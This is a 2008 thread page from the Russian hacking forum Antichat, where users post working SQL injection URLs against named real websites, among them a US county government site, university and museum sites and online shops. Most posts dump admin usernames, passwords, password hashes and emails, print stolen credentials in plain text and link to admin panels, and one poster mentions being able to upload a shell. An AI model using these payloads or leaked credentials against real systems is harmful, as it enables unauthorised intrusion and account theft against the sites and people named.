ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #5571  
Старый 30.05.2008, 17:04
gisTy
Постоянный
Регистрация: 24.05.2008
Сообщений: 589
Провел на форуме:
3629857

Репутация: 504


По умолчанию

Цитата:
Сообщение от sabe  
AkyHa_MaTaTa

токо вот где админка?)
а админка вот она

http://www.co.mason.wa.us/phpmyadmin/

=)))
 
Ответить с цитированием

  #5572  
Старый 30.05.2008, 17:41
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

[:|||||:]
Цитата:
http://casa-latina.ru/s/?cat=9999+union+select+1,concat(username,0x3a,pass word,0x3a,salt,0x3a,email,0x3a,icq),3,4,5,6,7+from +vb3_user+where+userid=1/*
Цитата:
http://casa-latina.ru/s/?cat=9999+union+select+1,concat(username,0x3a,pass word,0x3a,email),3,4,5,6,7+from+casalati_test.smil es_users/*
вобшем.. странная база))

gisTy
ну эт хорошо если нету этого
Цитата:
SELECT command denied to user 'mason_web'@'www.co.mason.wa.us' for table 'user'

Последний раз редактировалось sabe; 30.05.2008 в 18:48..
 
Ответить с цитированием

  #5573  
Старый 31.05.2008, 00:22
Imperou$
Познающий
Регистрация: 23.05.2008
Сообщений: 84
Провел на форуме:
192463

Репутация: 97
По умолчанию

Преамбула:
В общем, купил плеер себе assistant am-241 сегодня... Ну думаю-нифига себе экран, и как тут без видео, начал софтом что на диске конвертить-не работает .. Закачал новую версию конвертора, и та же фигня с определением. Потом инструкцию перечитал, ну блин, всё копейка в копейку делаю, ну ни как не принимает.
Ну, думаю сволочи-отмщу!! :/ искал их сайт и нашёл украинский филиал с багом-вот вам скуля (это ужо амбула )

http://assistant.net.ua/index.php?id=110&tovar=-30+union+select+1,2,3,4,5,6,7,8,9,concat_ws(0x3A3a ,login,pass,id),11,12,13,14,15+from+users/*

http://assistant.net.ua/admin -саатвецвенна админка

myst::qwe::5

логин,пасс,ид^^^

Эх, украинцы (хоть бы пароли оригинальней придумали, да в хэш загнали, shop ведь)...
И тут думаю-...чё не в медиа залить попробовать, а в дата и не определить видео файлменеджером на формат и читабельность (ну далеко менять ехать по гарантийке)...И получилось.
Так вот-дело не в скуле, а видел я когда копал гугл на предмет сабжа, что некий N1ghtmare спрашивал, как же разморочить модель эту на качество и разрешение (http://siemenz.ru/forum/22-285-1)...Вот и подумал, так сказать "скомпоновать", ибо видел человека с похожим ником тут.Если это тот человек и интересно ещё, конечно,то вроде обосновал или в ПМ.У меня работает Фильмы смотрю, не жалуюсь а шелл заливать не стал-(хоть и можно), стало обидно за себя, что раньше не догадался.
А модеров прошу минуса не ставить, т.к. по сабжу вроде отписал.Ну если вы на эту тему погуглите-то ничего подобного не найдёте-а ведь много людей купили и инетерсуются.
 
Ответить с цитированием

  #5574  
Старый 31.05.2008, 00:41
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.alwg.cap.gov

Цитата:
http://www.alwg.cap.gov/index.php?menu=-90+union+select+1,2,concat(database(),0x3a,version (),0x3a,user()),4,5/*
aer.noao.edu

Цитата:
http://aer.noao.edu/AERArticle.php?issue=-2+union+select+1,concat(Login,0x3a,password),3,4,5 ,6,7,8,9,10,11,12,13,14,15+FROM+Reviewers/*
выводится почемута не хочет кто вывидет мож.


phoenix.lpl.arizona.edu

Цитата:
http://phoenix.lpl.arizona.edu/blogsPost.php?bID=-145+union+select+1,2,3,4,concat(username,0x3a,pass word,0x3a,email),6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20+FROM+ssp2g_admins/*
phoenix:tom@rs:mike@woodpilestudios.com никаких md5 пасс в открытом виде )

Последний раз редактировалось ~!DoK_tOR!~; 09.06.2008 в 00:39..
 
Ответить с цитированием

  #5575  
Старый 31.05.2008, 07:42
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию

Autobuilding.ru
Цитата:
http://www.autobuilding.ru/gobanner.php?id=1'+order+by+1/*
и подбирать)) но вот на это ругается:
Цитата:
http://www.autobuilding.ru/gobanner.php?id=1'union+select+1/*
~!DoK_tOR!~, так интереснее:
Цитата:
http://phoenix.lpl.arizona.edu/blogsPost.php?bID=-145+union+select+1,2,3,4,concat(auth_user,0x3a,aut h_pass),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20+F ROM+authors+where+auth_status=0x61646d696e/*
awkes1.lpl.arizona.edu/admin/

Последний раз редактировалось sabe; 31.05.2008 в 11:11..
 
Ответить с цитированием

  #5576  
Старый 31.05.2008, 15:38
На100ящий
Познающий
Регистрация: 10.01.2008
Сообщений: 43
Провел на форуме:
97223

Репутация: 5
По умолчанию

http://www.bmoca.org/artist.php?id=-1+union+select+1,2,3,4,concat_ws(0x3a,username,pas sword),6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21 ,22,23,24,25+from+users/*
Логин = bmoca
Пасс = !boulderart!
Админка вот http://www.bmoca.org/admin
но ввойти почему то не могу((((( Чё так всё плохо?
 
Ответить с цитированием

  #5577  
Старый 31.05.2008, 15:49
BlackSun
Members of Antichat - Level 5
Регистрация: 01.04.2007
Сообщений: 1,268
Провел на форуме:
10046345

Репутация: 4589


По умолчанию

http://support.jgaa.com/index.php?cmd=ShowProduct&ID=-1/**/union/**/select/**/1,concat(Id,char(20),Name,char(20),Password),3,4,

5,6,7/**/from/**/User/*

20121 юзверей ..
 
Ответить с цитированием

  #5578  
Старый 31.05.2008, 18:22
Xszz
Участник форума
Регистрация: 23.04.2007
Сообщений: 233
Провел на форуме:
671223

Репутация: 91
Отправить сообщение для Xszz с помощью ICQ
По умолчанию

_http://www.identidadlatina.com/columnista_det.php?col_id=-37+UNION+SELECT+1,2,3,concat(user,char(58),passwor d)+FROM+mysql.user/*
 
Ответить с цитированием

  #5579  
Старый 31.05.2008, 20:00
Momiji
Постоянный
Регистрация: 25.08.2007
Сообщений: 530
Провел на форуме:
3926698

Репутация: 1446


Отправить сообщение для Momiji с помощью ICQ
По умолчанию

turtlevsbunny.com
Код:
http://turtlevsbunny.com/index.php?id=-2+union+select+1,2,concat_ws(0x3,version(),user(),database()),4,5,6,7,8/*
5.0.24a-standard-logjdigital_news@redondo.dreamhost.comjdigital_n ews
Код:
http://turtlevsbunny.com/index.php?id=-2+union+select+1,2,concat_ws(0x3,cal_lastname,cal_passwd,cal_email,cal_is_admin),4,5,6,7,8+from+calendar.webcal_user/*
Administrator21232f297a57a5a743894a0e4a801fc3:adm in
 
Ответить с цитированием

  #5580  
Старый 31.05.2008, 21:32
~!DoK_tOR!~
Banned
Регистрация: 10.11.2006
Сообщений: 829
Провел на форуме:
2634544

Репутация: 1559


Отправить сообщение для ~!DoK_tOR!~ с помощью ICQ
По умолчанию

www.alyamamah.edu.sa

Цитата:
http://www.alyamamah.edu.sa/showpage.php?id=-160+union+select+1,concat(name,0x3a,password,0x3a, email),3,4,5,6,7,8,9,10,11,12,13+FROM+ems_members+ limit+1,1/*
aziz:d0970714757783e6cf17b26fb8e2298f:azizsoft@lan tech.cc

www.bupipedream.com

Цитата:
http://www.bupipedream.com/pipeline_web/display_article.php?id=-1'+union+select+1,2,3,4,concat(database(),0x3a,ver sion(),0x3a,user()),6,7,8,9,10,11,12,13/*

Цитата:
http://www.evacsports.com/team.php?id=-1+union+select+concat_ws(0x3,version(),user(),data base()),2/*

Последний раз редактировалось ~!DoK_tOR!~; 31.05.2008 в 22:32..
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Обнаружение Sql инъекций в Oracle, часть вторая k00p3r Чужие Статьи 0 13.06.2005 11:26
SQL инъекция и Oracle, часть 2 k00p3r Чужие Статьи 0 13.06.2005 11:24
Sql инъекция и Oracle, часть первая k00p3r Чужие Статьи 0 13.06.2005 11:23
Внедрение Sql кода с завязанными глазами k00p3r Чужие Статьи 0 12.06.2005 20:48
SQL Injection в Oracle k00p3r Чужие Статьи 0 12.06.2005 12:41



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ